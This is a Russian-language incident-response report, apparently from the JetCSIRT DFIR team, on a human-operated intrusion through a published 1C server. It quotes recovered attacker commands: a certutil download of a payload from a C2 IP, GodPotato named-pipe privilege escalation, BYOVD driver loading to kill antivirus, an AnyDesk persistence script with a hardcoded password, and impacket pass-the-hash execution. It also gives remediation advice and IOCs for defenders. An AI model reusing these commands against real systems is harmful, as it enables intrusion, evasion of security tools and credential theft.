惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Vercel News
Vercel News
The GitHub Blog
The GitHub Blog
博客园 - 【当耐特】
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Recent Announcements
Recent Announcements
D
Docker
GbyAI
GbyAI
酷 壳 – CoolShell
酷 壳 – CoolShell
WordPress大学
WordPress大学
The Cloudflare Blog
雷峰网
雷峰网
A
About on SuperTechFans
小众软件
小众软件
博客园 - Franky
博客园 - 聂微东
F
Full Disclosure
大猫的无限游戏
大猫的无限游戏
C
Check Point Blog
MongoDB | Blog
MongoDB | Blog
G
Google Developers Blog
Microsoft Azure Blog
Microsoft Azure Blog
U
Unit 42
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
V
V2EX
Engineering at Meta
Engineering at Meta
宝玉的分享
宝玉的分享
aimingoo的专栏
aimingoo的专栏
量子位
P
Proofpoint News Feed
Hugging Face - Blog
Hugging Face - Blog
博客园_首页
罗磊的独立博客
Martin Fowler
Martin Fowler
D
DataBreaches.Net
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
S
Secure Thoughts
Project Zero
Project Zero
L
LangChain Blog
阮一峰的网络日志
阮一峰的网络日志
C
Cybersecurity and Infrastructure Security Agency CISA
T
Tailwind CSS Blog
S
Schneier on Security
Blog — PlanetScale
Blog — PlanetScale
The Hacker News
The Hacker News
Spread Privacy
Spread Privacy
Security Latest
Security Latest
NISL@THU
NISL@THU
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
C
CXSECURITY Database RSS Feed - CXSecurity.com
J
Java Code Geeks

Все публикации подряд на Хабре

Ловим музу за клавиатуру: как айтишнику стать автором Что умеет Midjourney в 2026? Мой немного грустный разбор этого шикарного инструмента Никто не любит писать тесты, но ИИ может исправить это IPv8 выглядит как мечта. Поэтому почти наверняка не взлетит Производители вернули в продажу материнки с DDR3. Что происходит? Управление агентом с телефона через Telegram теперь в KodaCode От координации к лидерству: как меняется роль руководителя разработки Я сделала родителям бизнес вместо пенсии: зарабатываем 70 тысяч, мама не даёт продать В три раза быстрее приемка товара и оптимизация трудозатрат на 73%: как «РСТ-Инвент» помог Gulliver Group ИИ-шечный мир победил? О влиянии искусственного интеллекта на игропром Кремль снижает давление на Телеграмм пока Европа строит интернет по паспорту Как CEO, CTO и CIO за 8 часов собрали ИИ-директора, который умеет держать позицию под давлением Как (не) потерять домен за выходные Вместо 8 разных VPS: как я организовал практику студентам на одном сервере Почему твой Open Source проект не замечают? R&D: искусство управления неопределенностью в разработке AI-дефляция: вакансий для разработчиков больше, а рост зарплат — худший за 15 лет Мы отдали управление роботами OpenClaw. Что из этого вышло Галактический ID: система идентификации для всех форм разумной жизни Шесть основ бизнес-анализа: начинаем с вопроса «Кто в игре?» Код-ревью, в котором дело не в коде Данные переехали. Команда — нет Системной подход к сдаче OSWE в 2025 Почему комната управления реактором покрашена в цвет морской пены 4 YAML-файла вместо PySpark: как аналитикам строить пайплайны без разработчиков LLM-агент для поиска свободных доменов: автоматизируем подбор Когда, зачем и как правильно начинать новую сессию в Claude Code? Как я заставил нейросеть писать макросы для FreeCAD Анатомия ИИ‑агента для подбора персонала. От тысячи резюме к топ‑10 за минуты Опыт разработчика как экономика внимания Автономность как точка невозврата: кто будет субъектом в цифровом будущем Обучение ИИ в «диких» условиях: как рутинные действия превращаются в датасеты Как измерить LLM для задач кибербеза: обзор открытых бенчмарков Где хранить код? Сравнение GitHub, GitLab и Bitbucket Математика объясняет, почему нормальное распределение встречается повсюду Почему ваш FinOps не работает: 12 тезисов от практиков Как подписать проектную документацию УКЭП с использованием бесплатных лицензий Pilot Адаптивное администрирование Sigla Vision Я грузил уран в бочки, а потом 20 лет строил ИТ в атомной отрасли Чем позвонить с Эвереста? История и обзор спутниковой связи. Часть 2 Как языковая модель помогает контролировать качество инструктажей по охране труда в металлургии Как не передать на desktop свой IP в РКН Анатомия SAP Privileges: как устроено управление правами в macOS MoneyDev: Сказка про три главных слова Обновлённый токенизатор видео K-VAE 2.0 от Сбера Как сделать диспетчеризацию дома на 1284 квартиры почти бесплатно Как мы разогнали железную дорогу Мы дали агентам рутину. Теперь надо решить — что делать с освободившимся временем Токсичный контент, промпт-хакинг и защита ИИ — всё о Guardrails для LLM Умный город начинается с точного взгляда: как «Фалькон Тех» меняет пространство к лучшему Навайбкодил приложение для анализа графов Почему Дюну так интересно читать? Упрощаем работу с рутиной или как стать Гендальфом Белым Деконструкция Go: CPU, RAM и что там происходит. Go Assembler база. Часть 1.1 Какие профессии исчезнут из-за ИИ, а какие появятся? И что с этим делать Как мы построили IT-отдел, где хочется расти: архитектурные встречи, прозрачные метрики и книжные подарки Rufler: Делаем из Claude Code автономный рой через один YAML-конфиг Sing-box и белый список приложений Как построить надёжный обмен сообщениями в микросервисах: лучшие практики для enterprise OpenAI строит MLM-пирамиду, а McKinsey и Accenture помогают ей в этом Дом, который не построил Фишер (Часть 2) «Сверхзвуковой математик» против «Вдумчивого логиста»: битва алгоритмов 3D-упаковки Мультимодальные модели – грубый и дорогой инструмент Разговоры ничего не стоят. Код тоже Проверки физических лиц: с кого начнет ФНС Топ-10 бесплатных нейросетей для создания видео в 2026 году Первые слои кода: как наши решения сегодня определяют архитектуру ИИ на десятилетия Разработка нового статического анализатора: PVS-Studio JavaScript Поиск уязвимостей ПО: базовый минимум или роскошный максимум Почему оценка персонала не работает как инструмент управления Как мы разработали ИИ-ассистента и сократили рутину продуктовой команды на 50% Как я ушел из найма, нажарил косточек и продал на маркетплейсах на 168 млн в год Когда 1С:ERP уже внедрена, а нормального производственного плана всё ещё нет Как я сделал Claude мультимодальным, подключив к нему Qwen Omni Как приглашение на вакансию мечты превращается в атаку Infrastructure as Code: философия и лучшие практики IaC Тестируем Yandex Code Assistant на задаче, в которой нужно хранить секреты nxs-universal-chart v3.0: новое поколение универсального Helm-чарта Callback Injection: Техника, которая отправила Microsoft Defender в глухой нокаут «Все идеи на стол»: митап как способ вывести проект из тупика Сегодня я узнал нечто новое о GPU благодаря багу в своей игре Как заставить LLM ̶ ̶г̶а̶л̶л̶ю̶ ̶ эволюционировать Карта событий как фундамент аналитики: практический кейс для E-commerce Что выбрать для AI: x86, ARM или RISC-V? Дайджест железа за март Роль соматических мутаций в развитии аутоиммунных заболеваний: путь к избирательной терапии Mythos от Anthropic — тревожный сигнал для всех, а не только для банков Guardrails для LLM на Java: как приручить промпт‑инъекции и токсичные ответы Green-VLA: как мы собрали VLA-модель для реального антропоморфного робота и не потеряли обобщение Финансовая гонка вооружений: почему умные люди добровольно в ней участвуют Эра ИИ-агентов наступила: выбираем лучшего цифрового сотрудника # Практический опыт внедрения WinCC Redundancy на производственном предприятии Сделал MVP за 3 дня, а потом неделю прикручивал оплату. Оно того стоило? Физика против Маска: почему Starship V3 может оказаться ещё одной катастрофой Нефть Венесуэлы: крупнейшие запасы в мире, но не крупнейшая нефтяная держава JPA 4. Переосмысление Hibernate Почему зеркальная фотокамера Nikon D5 десятилетней давности идеально подошла для миссии «Артемида-2» Проект «Уровень-Спутник» или как мы сделали платформу для гидрологов «Замедлиться, чтобы ускориться»: почему ИИ повышает цену ошибок в требованиях и архитектуре Как с нуля поднять трафик IT-компании на 1657% при бюджете 55 тыс. и выжить Pixel-perfect Downsampling — идеальная отрисовка 50 миллионов точек без потерь
История одного инцидента, или почему не стоит публиковать 1С
CSIRT (Инфос · 2026-05-14 · via Все публикации подряд на Хабре

Уровень сложностиСредний

Время на прочтение10 мин

Охват и читатели1.1K

Кейс

Всем привет, на связи команда DFIR JetCSIRT!

Недавно мы столкнулись с кейсом, где злоумышленники были обнаружены на ранних этапах атаки. Они не успели довести дело до импакта, но изрядно наследили, что дало нам возможность изучить их тактики, техники и процедуры (TTP) в действии.

Мы готовы рассказать, как это было, и дать рекомендации по повышению уровня защищенности.

С чего всё началось?

Системные администраторы обратившейся к нам компании заметили в своей инфраструктуре новые учетные записи, которых там быть не должно было. Именно эта находка и стала поводом обратиться к нам за помощью в расследовании инцидента.

Собрав триажи с ключевых узлов инфраструктуры, мы приступили к анализу. Обнаруженные события действительно указывали на инцидент — запуск разведывательных команд, загрузка ВПО, создание новых учетных записей.

Стало понятно, что речь идет о человекоуправляемой атаке, и нужно принимать экстренные меры реагирования, чтобы закрыть злоумышленникам доступ в инфраструктуру:

Экстренные меры реагирования:

  • Временно ограничить сетевой доступ к инфраструктуре, разрешить его только для доверенных пользователей / сервисов.

  • Провести аудит учетных записей, отключить подозрительные.

  • Сбросить пароли от всех УЗ в Active Directory.

  • Так как на одном из узлов были обнаружены следы компрометации УЗ администратора домена, необходимо произвести сброс всех паролей в домене, в том числе сервисных, а для УЗ krbtgt, которая отвечает за шифрование и подписание билетов Kerberos — в обязательном порядке сделать это дважды (второй раз — после выполнения репликации в домене, примерно через 10 часов).

Продолжаем анализ, ищем точку входа

В ходе расследования мы традиционно выдвигаем несколько гипотез относительно точки входа. Гипотезы компрометации, естественно, зависят от исследуемой инфраструктуры, обычно рассматриваются RDP-bruteforce, фишинговая рассылка, компрометация учетных записей в следствие утечек, эксплуатация уязвимостей сервисов, доступных из сети Интернет.

Однако уже на этапе первичного анализа данных с сервера 1С стало очевидно, что именно он является наиболее вероятной точкой входа. Другие гипотезы отошли на второй план.

Помимо недавно созданных учётных записей на хосте 1С (например, УЗ amdin, это не опечатка, а попытка скрыть свое присутствие), мы обнаружили следы вредоносных процессов, которые запускаются от процесса rphost.

rphost — это основной процесс сервера «1С:Предприятие 8.3», который отвечает за выполнение серверных процедур, обслуживание клиентских соединений и взаимодействие с сервером баз данных.

Если от легитимного прикладного процесса (например, сервера 1С, веб-сервера, СУБД) появляются дочерние процессы cmd.exe или PowerShell — это верный признак атаки на сервис. Такой паттерн поведения практически никогда не встречается в штатной работе.

Кроме того, в данном инциденте мы наблюдали, как злоумышленники активно используют технику LOTL (Living off the Land) для сокрытия своих действий. Речь идет об использовании легитимного программного обеспечения, уже присутствующего в системе, для достижения своих деструктивных целей.

События запуска cmd.exe от процесса rphost.exe:

Parent Process: "c:\program files\1cv8\8.3.27.1688\bin\rphost.exe"

ProcessCommandLine: ""c:\program files\1cv8\8.3\bin\rphost.exe" -range 1560:1591 -reghost host01 -regport 1541 -pid f1809409-3e18-4a6a-b186-cb0a56a1bbe9 -debug -tcp -fromsrvc"

Child Process: "C:\Windows\System32\cmd.exe"

TargetProcessCommandLine: "cmd.exe /C "certutil -urlcache -f http://101.99.75[.]253:10011/server.exe C:\Users\[username]\AppData\Local\Temp\server.exe""

К сожалению, как это часто бывает, настройки аудита в инфраструктуре оставляли желать лучшего, и информации в журналах не так много, как хотелось бы. Предположительно, злоумышленники получили доступ к базе с использованием скомпрометированной учетной записи, с правами на запуск внешних обработок, что позволило выполнять команды от имени процесса 1С.

Повышение привилегий

Получив возможность выполнять код от имени сервера 1С, злоумышленники приступили к этапу повышения привилегий.

Для этого использовалась связка инструментов SeImpersonate-Auditor и GodPotato. На практике реализация атаки выглядит следующим образом.

Пример команды на PowerShell:

powershell -c $pipe = New-Object System.IO.Pipes.NamedPipeServerStream('testpipe', [System.IO.Pipes.PipeDirection]::InOut, 1, [System.IO.Pipes.PipeTransmissionMode]::Message, [System.IO.Pipes.PipeOptions]::Asynchronous); $pipe.WaitForConnection(); Start-Sleep -Seconds 10

Создается именованный канал, к которому затем принудительно подключается системный процесс RPCSS (Remote Procedure Call System Service), с помощью привилегии SeImpersonatePrivilege эксплойт GodPotato извлекает токен SYSTEM, и злоумышленник получает права выполнять код от имени системы.

Отключение СЗИ

Для развития атаки и беспрепятственной работы необходимо отключить СЗИ, для этого злоумышленники использовали технику BYOVD (Bring Your Own Vulnerable Driver). Её суть заключается в следующем: на атакуемую систему загружается легитимный, подписанный драйвер, содержащий известную уязвимость. Операционная система доверяет цифровой подписи, загружает драйвер в ядро, после чего атакующие через IOCTL-интерфейс (Input/Output Control) получают возможность выполнять произвольный код с наивысшими привилегиями.

В данном инциденте в качестве такого драйвера использовался PoisonX.sys. Это довольно свежий драйвер для техники BYOVD, подробнее про его разбор и вызываемые IOCTL можно почитать здесь.

Драйвер позволил злоумышленникам завершить процессы систем защиты, которые были защищены от обычных методов принудительного завершения.

Событие установки драйвера:

Event 7045 A service was installed in the system.

Service Name: PoisonX

Service File Name:  C:\Users\user1cv8\AppData\Local\Temp\PoisonX.sys

Service Type:  kernel mode driver

Service Start Type:  demand start

Команды PowerShell для поиска и удаления хостовых СЗИ:

tasklist | findstr avp

sc start PoisonX

sc query PoisonX

.\Remove-Kaspersky.ps1

Закрепление в инфраструктуре

Для дополнительного закрепления в инфраструктуре злоумышленники предпочли использовать легитимное программное обеспечение для удаленного доступа AnyDesk. Для установки был использован PowerShell-скрипт deploy-anydesk-clean.ps1, часть команд из которого приведена далее.

Команды из скрипта deploy-anydesk-clean.ps1:

$AnyDeskUrl = "https://download.anydesk.com/AnyDesk.exe"

$InstallPath = "C:\Program Files (x86)\AnyDesk"

$AnyDeskPassword = "Kremlin12311!"

$SystemUsernames = @(

    "WgAuthUtility", "SvchostManager", "NetworkServiceHost", "DcomLaunchSvc",

    "RpcEndpointMapper", "EventLogHelper", "WmiProviderHost", "SecurityHealthSvc",

    "UserManagerSvc", "CredentialManager", "SystemGuardian", "PolicyAgent",

    "DnsCacheHelper", "WinmgmtProvider", "SvcHostHelper", "BackgroundTasksHost",

    "DeviceAssociationSvc", "StorageService", "UpdateOrchestrator", "LicenseManager"

)

$RandomPassword = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 12 | ForEach-Object { [char]$_ })

$installer = "$env:TEMP\AnyDesk_installer.exe"

Invoke-WebRequest -Uri $AnyDeskUrl -OutFile $installer -UseBasicParsing -ErrorAction SilentlyContinue

Write-Host "[3/4] Installing AnyDesk..." -ForegroundColor Green

Start-Process -FilePath $installer -ArgumentList "--install", ""$InstallPath"", "--start-with-win", "--silent" -Wait -NoNewWindow -ErrorAction SilentlyContinue

Start-Sleep -Seconds 3

Write-Host "[4/4] Configuring AnyDesk..." -ForegroundColor Green

cmd /c "echo $AnyDeskPassword | "$InstallPath\AnyDesk.exe" --set-password" 2>&1 | Out-Null

$tempFile = "$env:TEMP\anydesk_id.txt"

Start-Process -FilePath "$InstallPath\AnyDesk.exe" -ArgumentList "--get-id" -RedirectStandardOutput $tempFile -NoNewWindow -Wait

В ходе расследования мы обратили внимание на пароль, использованный злоумышленниками для учетной записи AnyDesk. Подобный пароль упоминался в инциденте конца 2025 года, когда анонимная группировка заявляла о взломе разработчика реестра электронных повесток.

Развитие атаки, удаленное выполнение команд

Далее злоумышленники действовали достаточно стандартно — перемещались по сети по RDP и SMB, производили установку AnyDesk, выполняли разведывательные команды:

  • whoami

  • quser

  • ping hostname

  • curl ifconfig.me

  • net share

  • tasklist | findstr avp

В части команд допускались опечатки, иногда использовалась неверная раскладка (например, при попытке запуска whoami в событиях фиксировалось «црщфьш»). Это свидетельствует о том, что актор русскоговорящий и, скорее всего, из стран бывшего СНГ.

Для удаленного выполнения команд также загружались и использовались утилиты PAExec, PSExec, а для получения информации о домене — инструмент AdRecon. Создавались новые доменные учетные записи, добавлялись в привилегированные группы, такие как Domain Admins, KLAdmins.

В ходе расследования были обнаружены следы impacket и proxychains.

Следы использования impacket и proxychains:

Svc: BTOBTO ¦ Path: %COMSPEC% /Q /c echo net user amdin Kremlin12311 /add /domain ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat ¦ Acct: LocalSystem ¦ StartType: demand start

Svc: BTOBTO ¦ Path: %COMSPEC% /Q /c echo proxychains -q dcomexec.py [reducteddomain]/[reducteduser]@[reductedip] -hashes :4f1c66ea6d2eb11bca868aa78a361918 -object MMC20 ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat ¦ Acct: LocalSystem ¦ StartType: demand start

Кроме того, для доступа к данным в оперативной памяти злоумышленники использовали легитимный DFIR-инструмент MagnetRamCapturer:

Событие создания сервиса MagnetRamCapturer:

Svc: MagnetRAMCapturer ¦ Path: C:\ProgramData\MRCE5D5.tmp ¦ Acct: ¦ StartType: demand start

Он позволяет создавать полный дамп оперативной памяти, а уже из дампа злоумышленники могут извлекать аутентификационные данные.

Заключительная фаза атаки

Злоумышленники получили доступ в инфраструктуру и доступ к привилегированным УЗ, после чего закрепились несколькими способами. Мы предполагаем, что их конечные цели — шифрование и разрушение инфраструктуры — не были достигнуты благодаря грамотным и оперативным мерам реагирования.

Рекомендации

Этот инцидент для обратившейся компании завершился удачно. Для повышения уровня защищенности от подобных случаев необходимо выполнить ряд рекомендаций, в том числе базовых, про которые многие знают, но по каким-то причинам еще не применили для своей инфраструктуры:

Рекомендации по 1С:

  • Отзыв прав на запуск внешних обработок, рекомендуется встраивать необходимые обработки в конфигурацию 1С.

  • Для входа в 1С использовать доменную авторизацию со сложными паролями (длина пароля — 12+).

  • Использовать 2FA, данный функционал 1С доступен с версии 8.3.15.

  • Создать администратора кластера, если ранее не был настроен.

  • Ограничить доступ к файлу 1CV8Clst.lst, который хранит важную информацию, такую как список баз 1С, логины и хэши паролей.

  • Настроить аудит доступа к файлу 1CV8Clst.lst.

  • Не использовать доменную авторизацию между сервером 1С и MS SQL Server.

  • Изолировать серверные процессы ragent, rmngr и rphost (выполнение под разными УЗ, для изменения используются файл swpuser.ini и настройка службы ragent, инструкции).

Базовые рекомендации:

  • Наиболее критичные сервисы, необходимые в работе внутренним пользователям, должны быть доступны только из внутренней сети компании или после подключения к внутренней сети через RA VPN с MFA.

  • Минимизировать количество публикуемых сервисов, предоставляющих доступ к внутренним ресурсам. 

  • Необходимо своевременно обновлять опубликованные сервисы до последних версий, особенно — до последних обновлений безопасности.

  • Реализовать централизованной сбор и анализ событий ИБ за счет внедрения специализированных систем.

Индикаторы компрометации, инструменты, MITRE

Сетевые индикаторы:

IP-адрес

Описание

101.99.75[.]253

С2
Страна: Малайзия
AS 45839

176.37.239[.]4

Подключение к AnyDesk
Страна: Украина
AS 39608

Имя файла

SHA-256

MD5

Описание

PoisonX.sys

a5035cbd6c31616288aa66d98e5a25441ee38651fb5f330676319f921bb816a4

2cc835399634d1f8f50e465201bfd877

Microsoft-signed vulnerable driver

wamsdk.sys

5af1dae21425dda8311a2044209c308525135e1733eeff5dd20649946c6e054c

b6b51508ad6f462c45fe102c85d246c8

Vulnerable WatchDog Antimalware driver

Tools:

AnyDesk, server.exe, PAExec, PSExec, Impacket, proxychains, chisel, MagnetRAMCapture, Mimikatz, KslKatz, deploy-anydesk-clean.ps1, Remove-Kaspersky.ps1

MITRE ATT&CK:

Тактика

Техника

Описание

Initial access

T1190    Exploit Public-Facing Application

Злоумышленники эксплуатируют уязвимости систем, доступных из сети Интернет, в частности 1С

Initial access

T1078    Valid Accounts

Злоумышленники используют легитимные учетные данные для первоначального доступа, закрепления, повышения уровня привилегий или предотвращения обнаружения

Execution

T1059  Command and Scripting Interpreter

Злоумышленники активно используют интерпретаторы командной строки и сценариев для выполнения команд или запуска сценариев и исполняемых файлов

Persistence

T1136    Create Account

Злоумышленники в ходе атак создают учетные записи для закрепления в инфраструктуре

Persistence

T1078    Valid Accounts

Злоумышленники используют скомпрометированные УЗ в ходе атаки

Persistence

T1133 External Remote Services

Злоумышленники устанавливали легитимное ПО удаленного доступа AnyDesk для того, чтобы закрепиться в системе

Privilege Escalation

T1078    Valid Accounts

Для повышения привилегий используют скомпрометированные легитимные доменные и локальные учетные записи

Privilege Escalation

T1134 Access Token Manipulation

Злоумышленники используют ВПО для кражи токена доступа и повышения привилегий до уровня SYSTEM

Privilege Escalation

T1098 Account Manipulation

Злоумышленники добавляли скомпрометированные УЗ в привилегированные группы Domain Admins, KLAdmins

Stealth

T1036 Masquerading

Злоумышленники маскируют используемое ВПО под другие легитимные программы

Stealth

T1078 Valid Accounts

Злоумышленники используют скомпрометированные учетные данные

Defense Impairment

T1685 Disable or Modify Tools

Злоумышленники отключают средства защиты, а также изменяют их настройки, используя технику BYOVD 

Credential Access

T1003 OS Credential Dumping

Злоумышленники создавали дамп оперативной памяти с использованием MagnetRam Capturer

Злоумышленники получали аутентификационные данные из памяти процесса LSASS

Discovery

T1087 Account Discovery

Злоумышленники собирают сведения о локальных и доменных группах, используя команды powershell, cmd

Discovery

T1069 Permission Groups Discovery

Злоумышленники собирают сведения о домене с использованием ADRecon

Discovery

T1083 File and Directory Discovery

Злоумышленники просматривают файлы и каталоги в скомпрометированных системах

Discovery

T1518 Software Discovery

Злоумышленники проводят поиски антивирусного ПО на системе путем запуска команд tasklist | findstr avp

Lateral Movement

T1021 Remote Services

Злоумышленники используют службы удаленного доступа и протоколы удаленного доступа для перемещения внутри инфраструктуры

Lateral Movement

T1570 Lateral Tool Transfer

Злоумышленники передают инструменты или другие файлы между системами в скомпрометированных системах

Command and Control

T1219    Remote Access Software

Злоумышленники используют стороннее ПО для обеспечения удаленного доступа и установления интерактивного канала управления и контроля в целевых системах (AnyDesk)

Command and Control

T1572 Protocol Tunneling

Злоумышленники использовали ПО для построения сетевых туннелей Chisel

Авторы:

Артем Семагин, ведущий аналитик киберкриминалистики, «Инфосистемы Джет».Даниил Кирьяков, ведущий аналитик, «Инфосистемы Джет».